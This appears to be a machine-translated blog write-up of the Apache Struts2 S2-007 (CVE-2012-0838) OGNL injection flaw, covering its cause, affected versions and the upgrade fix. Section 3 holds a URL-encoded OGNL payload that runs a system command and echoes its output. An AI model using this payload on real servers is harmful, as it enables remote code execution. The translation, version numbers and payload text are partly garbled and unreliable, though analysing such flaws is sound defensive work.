Struts2 cve-2012-0838 s2-007 Remote Code execution

Catalog

1 . Description2. Effected Scope3. ExploitAnalysis4. Principle of Vulnerability5. Patch Fix

1. Description

S2-007 and s2-003, s2-005 the source of the loopholes are the same, are struts2 to OGNL in the parsing process of a loophole, resulting in the hacker can be implemented through the OGNL expression code injection and execution, the difference is

1. s2-003, s2-005:implements code execution 2 through the assignment parsing process of OGNL value, #访问全局静态变量 (AOP idea) . s2-007: Implement code Execution by string to long conversion process in OGNL // i.e. their attack vectors are different

User input is evaluated as an OGNL expression when there ' a conversion error. This allows a malicious user to execute arbitrary code.
For information about Struts2 OGNL, see another article

http://www.cnblogs.com/LittleHann/p/4614488.html// Search: 5. struts2 OGNL Expression 

Relevant Link:

http://struts.apache.org/docs/s2-007.htmlhttp://cve.scap.org.cn/cve-2012-0838.html

2. Effected Scope

2.0. 0 2.2. 3

3. Exploit Analysis

0x1:poc

id='%2b (%23_memberaccess.allowstaticmethodaccess=true,%23context["xwork. Methodaccessor.denymethodexecution "]=false,%23cmd=" ifconfig ",%[email protected] @getRuntime (). EXEC (%23cmd),% 23data=new+java.io.datainputstream (%23ret.getinputstream ()),%23res=new+byte[500],%23data.readfully (%23res),% 23echo=new+java.lang.string (%23res),%[email protected] @getResponse (),%23out.getwriter (). println (%23echo))%2b  '

4. Principle of vulnerability

A vulnerability exists in version 2 prior to Apache Struts 2.2.3.1 because the evaluation string is an OGNL expression when processing a conversion error. Remote attackers can exploit this vulnerability to modify RUN-TIME data values with invalid input to execute arbitrary code

5. Patch Fix

0x1:upgrade struts2

 is 2.3. 1.1, which contains the corrected classes.

Relevant Link:

Copyright (c) Little5ann All rights reserved

Struts2 cve-2012-0838 s2-007 Remote Code execution